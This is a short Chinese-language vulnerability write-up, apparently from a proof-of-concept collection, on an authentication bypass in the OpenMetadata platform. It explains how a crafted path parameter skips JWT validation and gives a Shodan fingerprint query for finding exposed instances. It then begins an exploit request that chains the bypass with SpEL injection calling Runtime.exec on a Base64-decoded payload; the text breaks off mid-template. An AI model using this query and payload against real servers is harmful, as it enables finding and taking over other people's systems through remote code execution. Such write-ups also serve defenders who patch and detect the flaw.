0x01 产品简介
OpenMetadata 是一个统一的发现、可观察性和治理平台,由中央元数据存储库、深入的沿袭和无缝的团队协作提供支持。
0x02 漏洞概述
OpenMetadata存在身份认证绕过漏洞,攻击者可能会使用路径参数使任何路径包含任意字符串。例如,对“GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111' 将与排除的端点条件匹配,因此将在不进行 JWT 验证的情况下进行处理,从而允许攻击者绕过身份验证机制并访问任意端点。
0x03 测绘语句
shodan: http.favicon.hash:733091897
0x04 漏洞复现
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{
{payloa